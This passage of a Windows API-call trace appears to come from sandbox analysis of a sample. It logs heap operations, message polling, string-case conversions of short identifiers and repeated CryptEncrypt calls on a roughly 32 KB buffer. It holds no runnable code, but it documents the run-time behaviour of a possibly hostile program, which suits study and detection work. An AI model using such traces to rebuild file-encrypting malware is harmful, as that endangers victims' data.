Size=0x8) returned 0x2a71908 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0103.323] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0103.323] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.323] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0103.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0103.323] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0103.324] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0103.324] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0103.324] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.325] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.325] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.325] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0103.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0103.326] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a923a0 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0103.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.329] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x80c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x80c8) returned 1 [0103.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.329] CharLowerBuffW (in: lpsz="byte[32968]", cchLength=0xb | out: lpsz="byte[32968]") returned 0xb [0103.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.330] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.330] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.330] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.330] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.331] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a923a0*, pdwDataLen=0x8cef60*=0x80c1, dwBufLen=0x80c8 | out: pbData=0x2a923a0*, pdwDataLen=0x8cef60*=0x80c8) returned 1 [0103.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.332] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.333] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.333] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: 